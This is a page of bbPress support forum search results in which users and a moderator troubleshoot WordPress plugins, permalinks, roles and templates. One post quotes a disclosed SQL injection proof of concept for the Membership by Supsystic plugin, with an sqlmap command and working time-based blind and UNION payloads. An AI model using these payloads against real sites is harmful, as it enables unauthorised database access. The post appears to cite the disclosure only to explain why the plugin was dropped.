Skip to:
Content
Pages
Categories
Search
Top
Bottom

Search Results for '"wordpress"'

Viewing 25 results - 1,851 through 1,875 (of 26,812 total)
  • Author
    Search Results
  • #218725
    purityboy83
    Participant

    hi

    @robin-w

    You seem to inspire me

    install plug in Custom Post Type Permalinks instead of bbPress Permalinks with ID

    and the problem i had was resolved.

    Custom Post Type Permalinks

    This plugin is constantly updated and nice

    Thanks~!

    #218719
    Robin W
    Moderator

    ‘Oops! That embed can’t be found’ is not a bbpress error, it’s a wordpress one.

    but looking at the link below, I’d suggest it is related to your permalinks, and maybe the fact that you are using ID’s and a plugin for that

    https://wordpress.org/support/topic/wp-document-revision-plugin-permalink-does-not-work-to-embed/

    #218711
    purityboy83
    Participant

    Hi

    If add a link to “topic and reply”, the embed function does not work.

    ref img
    https://ibb.co/qxXG125

    site.com is an example for screenshots.
    I entered the actual URL

    error error embed
    Oops! That embed can’t be found

    ref img
    https://ibb.co/grXr9dV

    It was a site that has been without problems for months.
    I just discovered it by accident.

    The same is happening at the internal test site.

    I installed the “Health Check & Troubleshooting” plug-in from the test site
    and activated the Troubleshooting mode.

    and only 2 plugin activate
    – bbPress
    – bbPress Permalinks with ID

    The problem still occurs.
    It’s a well-used feature, site, but suddenly a problem arises and I’m confused.

    I must need to help

    wordpress 5.5.3
    PHP-7.4

    Thanks

    Best Regards,
    Hyunho

    #218641

    In reply to: Private forums

    Robin W
    Moderator
    #218622
    purityboy83
    Participant

    Hi

    I want the thumbnail to appear on the topic
    Search results found a plugin similar to the function I’m hoping for

    bbpress-topic-thumbnails
    https://wordpress.org/plugins/bbpress-topic-thumbnails/

    I want to add one more feature in this plugin.
    With this plugin, thumbnails of all forum topics are displayed

    I only want to use this feature for 1 specific forum
    reason for write topic is because the plugin has not been updated for a long time.

    So I ask for help here

    code is

    
    /*Hooks into the loop-topic.php output to print image*/
    add_action( 'bbp_theme_before_topic_title', 'bee_insert_thumbnail' );
    function bee_insert_thumbnail() {
    
            if((!bee_catch_image() == '')){
            echo('<a href="'); 
        echo(bbp_topic_permalink() . '"><img class="bbp-topic-thumbnail"  width="100%" style="max-width: ' . get_option('thumbnail_size_w') . 'px; max-height: ' . get_option('thumbnail_size_h'). 'px; vertical-align:middle;" src="' . bee_catch_image() . '"/>' .'</a>');
            }
    }
    
    /*Function that retrieves the first image associated with the topic*/
    function bee_catch_image() {
      global $post, $posts;
      $first_img = '';
      ob_start();
      ob_end_clean();
      $output = preg_match_all('/<img.+src=[\'"]([^\'"]+)[\'"].*>/i', $post->post_content, $matches);
      $first_img = $matches [1] [0];
      return $first_img;
    }
    

    Anyone can help?
    Thanks

    #218600
    st11
    Participant

    I am trying to create a custom role that can only reply to existing topics.

    I followed this to create new role. At first, the role did appear in dropdown list in admin edit user screen, but after saving, it went back to “— No role for these forums —”.

    I found this thread, so.. I created custom WordPress role in the same name. This made the bbPress role to be “saved” but it doesn’t seem to add capabilities. The user with this role can’t see forum or topics.

    How can I get this custom bbPress user role to have custom capability?

    WordPress 5.5, bbPress 2.6.6

    marcopAolo
    Participant

    Wordpress version 5.6
    bbpress Version 2.6.6
    website: jackkornfield.com
    I recently moved a reply to topic and now from the WPAdmin when I click on Replies I get a 502 error, So I am unable to view/edit replies from WordPress Admin. Please help.

    #218590
    Robin W
    Moderator

    bbp style pack

    once activated go to

    dashboard>settings>bbp style pack>Subscription Emails and there is a box to tick item 2 auto login and the appropriate login

    #218588
    Robin W
    Moderator

    ok, I can only suggest you install

    bbp style pack

    once activated go to

    dashboard>settings>bbp style pack>Breadcrumbs

    where you can reset where the root takes you to back to your forum page

    #218550

    In reply to: List Of Shortcodes

    flamuren
    Participant

    Robin you son of a wordpress god! That works!! haha amazing – please let me know how to send you some money 🙌

    #218538

    In reply to: New posts freezing

    Robin W
    Moderator

    @mike80222 – I’m trying to find time to think about this, but in the meantime 2 thoughts

    1. the default for 5.6 issues is to install

    Enable jQuery Migrate Helper

    2. bbpress only has a text editor as standard in front end , so how are you doing the visual editor you are switching to?

    #218528

    In reply to: New posts freezing

    Mike Witt
    Participant

    Hi @robin-w,

    Just bbPress. It’s my MemberPress, bbPress, BuddyPress “test site.” We generally don’t upgrade anything until testing it here first. I’m not upgrading WordPress on our real sites because of the editing bug. I do everything in text mode!

    If seems like (with WP 5.6.1) when you start editing a post in text mode, there’s no echo. If you switch to visual, the text is there. Some other weird thing seem to happen, but those are hard to pin down.

    AFAICT I don’t have any other plugins that should be involved.

    NOTE: FOR ME THIS ONLY HAPPENS ON MOBILE DEVICES, but I don’t really know if it’s mobile vs desktop or one browser vs another. I’ve read that the basic WP bug is browser dependent.

    From my perspective, it’s just one of the reasons that I’m not updating WP, so it’s not big deal in itself, but I am curious that (if I’m really seeing what I think I am) that it’s not been reported more!

    #218526

    In reply to: New posts freezing

    Mike Witt
    Participant

    If they are using WP 5.6.1 and posting in text mode, I wonder if it could be the same thing I’m seeing here:

    WordPress 5.6.1 bug affects forum text editing mode?

    #218503

    In reply to: Topic/Reply Form

    This is the default behavior of bbPress. Unless a plugin already provides a simple modification of this behavior, the easiest way to customize this would be by overriding the /bbpress/form-reply.php template part in your WordPress child theme.

    #218497
    xprojectsx
    Participant

    I’ve been going over this for days trying to import forum using the Example importer. Everything works but after importing about 300,000 records, all of the authors are incorrect after the import. I did a fresh install of WP and tried again but got the same results. I ran the bbpress tools and this made no difference.
    A lot of the users show as “Anonymous” but the rest are just pointing to the wrong user id. So the Topics/Replies just show as from the wrong user. I tried working around this by going into the source data and giving all of the user ids there a very high numerical value but even after doing this it made no difference. WordPress still assigns seemingly random userids to all of the imported users.

    #218474
    purityboy83
    Participant

    Hello again?

    @robin-w

    I thought of this problem as “bbp style pack”
    Because when a problem occurs, the error is “bbp style pack” error.
    this support link

    I just updated the bbp style pack, but bbpress still problems
    I don’t think it’s a “bbp style pack” problem
    (Because no error occurs after update)

    I’m worried because no error occurred
    First, I’ll try to disable the plugin one by one according to your guide and test it.

    I will also install the “Health Check & Troubleshooting” plugin.

    Thanks

    Best Regards,
    Hyunho

    #218472
    Robin W
    Moderator

    works fine on my test site – I can only suggest it could be a theme or plugin issue

    Themes

    As a test switch to a default theme such as twentytwenty, and see if this fixes.

    Plugins

    If that doesn’t work, also deactivate all plugins apart from bbpress and see if this fixes. if it does, re-enable one at a time to see which is causing the error.

    If you cannot do this to your site (say because it is live) then use the ‘troubleshooting’ features of this plugin to let you test without affecting other users

    Health Check & Troubleshooting

    Then come back

    #218471
    Robin W
    Moderator

    if you’re happy using bbpress templates, then grab the version from my style pack plugin

    bbp style pack

    it is in

    plugins\bbp-style-pack\trunk\templates\templates1\loop-forums.php

    it should work if you just copy it to your child theme’s bbpress folder.

    Alternately you can just use the plugin and once activated go to

    dashboard>settings>bbp style pack>forum templates

    #218470
    Robin W
    Moderator

    If you are happy to have a hands on approach to user registrations, then you probably don’t need a membership plugin.

    As far as the bbpress part goes

    forums set to public are viewable by anyone
    forums set to private are viewable only by registered users

    so if you set forums to private they will not appear to unregistered users, so only visible once a user has logged in. If you set not to allow anonymous posting (dashboard>settings>forums) , then only registered users will be able to post.

    bbpress just uses wordpress users for login and registration with an extra bbpress parameter, so you can just use wordpress to set up users.

    If you are going to have manual registration, then you turn off ‘anyone can register’ in wordpress (dashboard>settings>general>membership), and create a form using a form plugin (eg contact form 7) to let users ask to register with whatever fields you want. This will be emailed to whoever you want, who can then decide if they should allow membership.
    You can then take payment manually (eg bank transfer) or via say a Paypal link on your site.

    The approver would then add the user (2 minutes or less).

    As far as wordpress page content then use a plugin that restricts content to registered users such as

    Content Control – User Access Restriction Plugin

    finally you would use

    bbPress Messages

    to allow uses to message each other – don’t worry that this plugin has not been updated for a while – it is stable and works

    as far as I can see that would meet your requirements list.

    #218467
    kantholz93
    Participant

    The Plugin was (luckily) not installed. We just decided to use it, then we saw that wordpress has taken it down on their Plugin Site.

    The exploit seems to be an SQL Injection.

    # 1. Description

    The GET parameters “search” and “sidx” does not sanitize user input when searching for badges.

    # 2. Proof of Concept (PoC)

    Use ZAP/Burp to capture the web request when searching for data and save it to request.txt
    Referer: http://192.168.0.63/wp-admin/admin.php?page=supsystic-membership&module=badges&action=index

    sqlmap -r request.txt –dbms=mysql -p search

    Parameter: search (GET)
    Type: time-based blind
    Payload: route=badges.getTblList&wpnonce=729ac6199a&action=supsystic-membership&search=s’ AND (SELECT 8958 FROM (SELECT(SLEEP(5)))oBIL) AND ‘trjK’=’trjK&_search=false&nd=1596991012186&rows=10&page=0&sidx=id&sord=desc

    Type: UNION query
    Payload: route=badges.getTblList&wpnonce=729ac6199a&action=supsystic-membership&search=s’ UNION ALL SELECT NULL,CONCAT(0x71786a6b71,0x6569796370704c625352574e6e424874456a74457847635473525a466d47576f775a46446b4e7055,0x716a7a6a71),NULL,NULL– -&_search=false&nd=1596991012186&rows=10&page=0&sidx=id&sord=desc

    #218465
    purityboy83
    Participant

    Hi

    upgrade to wordpress 5.6.1 and php 8.0.2

    I wrote a new topic
    When writing is completed, the following abnormal screen is displayed.

    ref img1 : https://ibb.co/DbDR2vT

    ref img2 : https://ibb.co/M53Lwgb

    Seriously, nothing is left in nginx’s error log.
    Nothing is left in the error log of php-fpm.

    The topics created before the upgrade can be read normally.

    This problem arises from topics created after the upgrade.

    i need to help

    Best Regards,
    Hyunho

    #218451
    kantholz93
    Participant

    I wanted to create a membership site with: Membership by Supsystic and integrate bbPress for the forum part.
    But this has been exploited on February 8th, so it’s no longer an option.

    We wanted that:
    – members can interact with each other
    – the forum is only for registered members
    – members need approval for registration (they have to pay first)
    – some wordpress pages are only for registrated members
    – all other wordpress pages are visible for everyone

    All of this was achievable with the Members by Supsystic Plugin + the paid extension to limit some pages only for members.

    Is there any alternative that works with bbPress? Our forum already uses bbPress and we wanted to keep it that way.

    Thank you very much for any help!

    This is our actual membership page on our website (idk if you need it): https://nestli-seminare.de/netzwerk/login-bereich/

    Thanks!

    Nicklas

    anhduc.bkhn
    Participant

    I just test, it worked on my new testing:

    
    WordPress version: 5.5.3
    WooCommerce version: 4.4.1
    
    On WP 5.5.3, It could call to bsp_test_email function ( includes/functions_email.php)
    
    On WP 5.6, It could not call to  bsp_test_email function ( includes/functions_email.php)
    
    #218422

    In reply to: List Of Shortcodes

    Robin W
    Moderator

    bbp style pack

    once activated go to

    dashboard>settings>bbp style pack>shortcodes

Viewing 25 results - 1,851 through 1,875 (of 26,812 total)
Skip to toolbar